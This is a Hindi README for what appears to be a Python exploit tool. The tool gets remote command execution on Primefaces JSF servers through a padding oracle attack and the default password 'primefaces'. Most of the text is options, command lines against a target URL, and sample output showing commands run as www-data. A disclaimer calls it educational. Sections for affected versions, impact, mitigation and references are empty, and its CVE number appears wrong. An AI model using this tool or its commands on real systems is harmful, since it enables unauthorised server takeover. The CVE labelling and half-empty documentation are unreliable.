
# CVE-2020-1039909 के लिए Python-आधारित एक्सप्लॉइट, Primefaces JSF में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता। पैडिंग ओरेकल हमले के माध्यम से मनमाने कमांड निष्पादित करता है, जिसमें प्रॉक्सी, कुकीज़ और POC मोड के विकल्प शामिल हैं।
README - CVE-2020-1039909 Primefaces रिमोट कोड एक्सीक्यूशन
============================================================
भेद्यता के बारे में
CVE-2020-1039909 Primefaces JSF फ्रेमवर्क में रिमोट कोड एक्सीक्यूशन (RCE) भेद्यता है। यह दोष एक पैडिंग ओरेकल हमले के माध्यम से हमलावर को सर्वर पर मनमाने कमांड निष्पादित करने की अनुमति देता है, जो कमजोर एन्क्रिप्शन और डिफ़ॉल्ट पासवर्ड के उपयोग के कारण होता है।
प्रभावित संस्करण:
प्रभाव:
============================================================
पूर्व-आवश्यकताएँ
निर्भरताओं की स्थापना:
pip install requests pycryptodome paddingoracle
============================================================
उपलब्ध कमांड
मूल पैरामीटर:
target लक्ष्य का URL (उदा: http://target.com) -pw, --password Primefaces पासवर्ड (डिफ़ॉल्ट: primefaces) -pt, --path dynamiccontent.properties का पथ (डिफ़ॉल्ट: /javax.faces.resource/dynamiccontent.properties.xhtml) -c, --cmd निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: whoami) -poc, --poc परीक्षण पेलोड का उपयोग करें (केवल भेद्यता जांचता है) -px, --proxy प्रॉक्सी कॉन्फ़िगर करें (उदा: http://127.0.0.1:8080) -ck, --cookie कुकी कॉन्फ़िगर करें -o, --oracle पैडिंग ओरेकल हमला सक्रिय करें (1 = सक्रिय, 0 = निष्क्रिय) (डिफ़ॉल्ट: 0) (धीमा) -pl, --payload एन्क्रिप्टेड EL पेलोड (पैडिंग ओरेकल के साथ उपयोग के लिए)
============================================================
उपयोग के उदाहरण
python3 exploit.py http://target.com
python3 exploit.py http://target.com -c "id"
python3 exploit.py http://target.com --poc
python3 exploit.py http://target.com -px http://127.0.0.1:8080
python3 exploit.py http://target.com -ck "JSESSIONID=xxx"
python3 exploit.py http://target.com -o 1 -c "whoami"
python3 exploit.py http://target.com -pl "payload_criptografado"
============================================================
आउटपुट का उदाहरण
$ python3 exploit.py http://target.com -c "id"
[] Generated Encrypted Payload: xyz123... [] Attempting to execute: id
POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 ...
HTTP/1.1 200 OK ...
[+] Exploit Result:
HTTP/1.1 200 OK ...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================
POC मोड (भेद्यता परीक्षण)
POC मोड केवल यह जांचता है कि लक्ष्य भेद्य है या नहीं, बिना खतरनाक कमांड निष्पादित किए:
python3 exploit.py http://target.com --poc
भेद्य होने पर अपेक्षित आउटपुट:
[+] BANG!!! :D - Target IS VULNERABLE!!!
भेद्य न होने पर आउटपुट:
[-] Target Probably NOT VULNERABLE :-(
============================================================
पैडिंग ओरेकल (धीमा मोड)
यदि डिफ़ॉल्ट हमला काम नहीं करता है (खाली प्रतिक्रिया बॉडी), तो पैडिंग ओरेकल मोड आज़माएं। यह मोड धीमा है लेकिन अधिक प्रभावी है:
python3 exploit.py http://target.com -o 1 -c "whoami"
============================================================
प्रॉक्सी और डीबग
Burp Suite के साथ अनुरोधों का विश्लेषण करने के लिए:
python3 exploit.py http://target.com -px http://127.0.0.1:8080
============================================================
सामान्य त्रुटियाँ और समाधान
"Response body empty... Target might not be vulnerable" पैडिंग ओरेकल मोड आज़माएं: -o 1
"Target Probably NOT VULNERABLE" लक्ष्य पैच किया गया हो सकता है या डिफ़ॉल्ट पासवर्ड का उपयोग नहीं करता है
"Connection refused" जांचें कि लक्ष्य सुलभ है या नहीं
"SSL Error" https के बजाय http का उपयोग करें या प्रमाणपत्रों को अनदेखा करें
============================================================
एक्सप्लोरेशन के लिए सुझाव
============================================================
अस्वीकरण
यह सॉफ़्टवेयर शैक्षिक और परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस टूल के दुरुपयोग से उत्पन्न किसी भी क्षति, हानि या परिणाम के लिए लेखक जिम्मेदार नहीं है।
उपयोगकर्ता अपने कार्यों के लिए पूरी तरह जिम्मेदार है। बिना अधिकार के सिस्टम पर इस एक्सप्लॉइट का उपयोग अवैध है और इसके परिणामस्वरूप सिविल और आपराधिक दंड हो सकते हैं।
जिम्मेदारी और नैतिकता के साथ उपयोग करें। ज्ञान साझा करने के लिए है, लेकिन बुद्धिमत्ता यह जानने में है कि इसका उपयोग कैसे और कब करना है।
============================================================
शमन (प्रशासकों के लिए)
============================================================
संदर्भ
============================================================
Developed by byt3l0rd